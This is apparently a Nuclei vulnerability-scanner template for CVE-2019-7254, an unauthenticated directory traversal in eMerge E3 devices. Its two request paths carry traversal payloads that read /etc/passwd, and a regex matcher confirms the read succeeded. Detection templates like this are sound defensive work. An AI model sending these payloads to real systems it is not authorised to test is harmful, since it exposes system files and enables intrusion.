nuclei-templates/cves/2019/CVE-2019-7254.yaml

26 lines
531 B
YAML

id: CVE-2019-7254
info:
name: eMerge E3 1.00-06 - Unauthenticated Directory Traversal
author: 0x_Akoko
severity: high
reference: https://www.exploit-db.com/exploits/47616
tags: emerge,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/?c=../../../../../../etc/passwd%00"
- "{{BaseURL}}/badging/badge_print_v0.php?tpl=../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200